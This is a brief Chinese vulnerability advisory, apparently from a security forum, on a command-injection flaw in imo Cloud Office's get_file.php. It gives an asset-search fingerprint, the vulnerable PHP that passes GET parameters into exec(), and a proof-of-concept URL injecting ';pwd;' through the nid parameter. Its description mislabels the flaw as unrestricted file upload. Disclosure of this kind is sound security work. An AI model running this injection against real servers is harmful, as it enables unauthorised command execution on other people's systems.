imo 云办公室 get_file.php 远程命令执行漏洞

# imo 云办公室 get_file.php 远程命令执行漏洞 ## 漏洞描述 imo 云办公室 /file/NDisk/get_file.php 过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。 #...

imo 云办公室 get_file.php 远程命令执行漏洞

漏洞描述

imo 云办公室 /file/NDisk/get_file.php 过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限。

漏洞影响

imo 云办公室

网络测绘

app="iMO-云办公室"

漏洞复现

登录页面

img

漏洞文件 get_file.php

<?php
// 放置在 mfs 服务器上用于获取文件列表,配合 nd_verify_large_file.php 使用
if(empty($_GET['cid']) || empty($_GET['nid']))
    exit;
$cid = $_GET['cid'];
$nid = $_GET['nid'];
$mainDir = dirname(__FILE__) . '/../upload/NDiskData/normal/' . $cid . '/';
exec("ls {$mainDir}*_{$nid}_*", $r);
$ret = array();
foreach($r as $v)
    $ret[md5_file($v)] = str_replace(dirname(__FILE__) . "/../upload/NDiskData/normal/{$cid}/", '', $v);
echo json_encode($ret);

验证POC

/file/NDisk/get_file.php?cid=1&nid=;pwd;

img

  • 发表于 2024-07-12 18:46:17
  • 阅读 ( 2586 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计